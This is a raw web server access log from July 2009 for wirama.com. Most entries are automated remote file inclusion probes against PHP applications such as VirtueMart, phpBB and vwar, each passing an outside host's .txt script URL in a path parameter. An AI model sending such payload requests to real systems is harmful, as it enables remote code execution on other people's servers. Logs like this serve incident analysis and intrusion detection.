124.0.139.129 - - [01/Jul/2009:20:34:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:34:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:35:10 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:20:35:15 -0700] "GET /logs/access_090330.log//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:20:35:15 -0700] "GET /logs//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:20:35:15 -0700] "GET /components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:20:35:32 -0700] "GET /logs/access_090330.log//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:20:35:32 -0700] "GET /components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:20:35:32 -0700] "GET /logs//components/errors.php?error=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:35:50 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:35:50 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:35:50 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:35:57 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:35:57 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:35:57 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:36:16 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:36:16 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:20:36:16 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:37:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:37:03 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:37:07 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:37:12 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:20:38:56 -0700] "GET /logs/access_090330.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:20:38:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:20:38:56 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
63.223.85.28 - - [01/Jul/2009:20:39:29 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
63.223.85.28 - - [01/Jul/2009:20:39:29 -0700] "GET /include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
63.223.85.28 - - [01/Jul/2009:20:39:29 -0700] "GET /logs/access_090401.log//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.183 - - [01/Jul/2009:20:43:01 -0700] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
122.153.28.140 - - [01/Jul/2009:20:46:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:46:49 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:46:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:48:13 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:48:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:48:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:49:55 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:49:59 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:50:31 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:20:50:31 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:20:50:31 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
131.203.76.246 - - [01/Jul/2009:20:51:31 -0700] "GET /components/errors.php?error=http://alsoenglish.com/rgboard/header/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
131.203.76.246 - - [01/Jul/2009:20:51:31 -0700] "GET /logs//components/errors.php?error=http://alsoenglish.com/rgboard/header/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
131.203.76.246 - - [01/Jul/2009:20:51:31 -0700] "GET /logs/access_090330.log//components/errors.php?error=http://alsoenglish.com/rgboard/header/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
124.0.139.129 - - [01/Jul/2009:20:51:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:20:51:40 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.0.139.129 - - [01/Jul/2009:20:51:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.147.29.190 - - [01/Jul/2009:20:54:43 -0700] "GET /logs/errors.php?error=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.147.29.190 - - [01/Jul/2009:20:54:43 -0700] "GET /logs/access_090531.log/errors.php?error=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.147.29.190 - - [01/Jul/2009:20:54:43 -0700] "GET /errors.php?error=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.161.174.220 - - [01/Jul/2009:20:55:05 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:20:55:19 -0700] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:20:55:19 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
82.165.156.112 - - [01/Jul/2009:20:55:19 -0700] "GET /logs/access_090330.log//vwar/convert/mvcw.php?step=1&vwar_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:56:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.153.28.140 - - [01/Jul/2009:20:56:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.161.174.220 - - [01/Jul/2009:21:02:44 -0700] "GET /logs/access_090601.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
122.161.174.220 - - [01/Jul/2009:21:02:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
122.161.174.220 - - [01/Jul/2009:21:02:46 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pokolake.land.ru/id4rom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
217.147.29.190 - - [01/Jul/2009:21:03:13 -0700] "GET /logs/access_090531.log%20%20/errors.php?error=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:06:39 -0700] "GET /errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:06:39 -0700] "GET /logs/access_090401.log/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:06:39 -0700] "GET /logs/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:06:46 -0700] "GET /errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:06:46 -0700] "GET /logs/access_090401.log/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:06:46 -0700] "GET /logs/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:07:29 -0700] "GET /logs/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:21:07:29 -0700] "GET /errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:21:07:29 -0700] "GET /logs/access_090401.log/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:07:32 -0700] "GET /logs/access_090401.log/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [01/Jul/2009:21:07:33 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [01/Jul/2009:21:07:33 -0700] "GET /logs/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.34.78.110 - - [01/Jul/2009:21:07:33 -0700] "GET /logs/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:21:07:33 -0700] "GET /errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [01/Jul/2009:21:07:33 -0700] "GET /logs/access_090401.log/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:07:35 -0700] "GET /logs/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [01/Jul/2009:21:07:35 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [01/Jul/2009:21:07:35 -0700] "GET /logs/access_090401.log/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.155.223 - - [01/Jul/2009:21:08:19 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.155.223 - - [01/Jul/2009:21:08:19 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.155.223 - - [01/Jul/2009:21:08:19 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [01/Jul/2009:21:09:00 -0700] "GET /logs/access_090401.log/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:09:00 -0700] "GET /logs/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:09:00 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:09:34 -0700] "GET /logs/access_090401.log/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:09:34 -0700] "GET /logs/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:09:34 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.252.92.3 - - [01/Jul/2009:21:12:46 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.252.92.3 - - [01/Jul/2009:21:12:46 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.252.92.3 - - [01/Jul/2009:21:12:49 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
131.203.76.246 - - [01/Jul/2009:21:14:23 -0700] "GET /logs/access_090331.log//components/errors.php?error=http://alsoenglish.com/rgboard/header/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:23 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:23 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:23 -0700] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:27 -0700] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:27 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:27 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:28 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:16:28 -0700] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
217.172.179.213 - - [01/Jul/2009:21:16:52 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.172.179.213 - - [01/Jul/2009:21:16:53 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.172.179.213 - - [01/Jul/2009:21:16:53 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.51.141.77 - - [01/Jul/2009:21:23:05 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:23:05 -0700] "GET /logs/access_090331.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:23:05 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:23:30 -0700] "GET /logs//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:23:30 -0700] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.51.141.77 - - [01/Jul/2009:21:23:30 -0700] "GET /logs/access_090331.log//errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.136.215 - - [01/Jul/2009:21:24:43 -0700] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.136.215 - - [01/Jul/2009:21:24:43 -0700] "GET /logs/access_090601.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.136.215 - - [01/Jul/2009:21:24:43 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.207.144.20 - - [01/Jul/2009:21:32:31 -0700] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
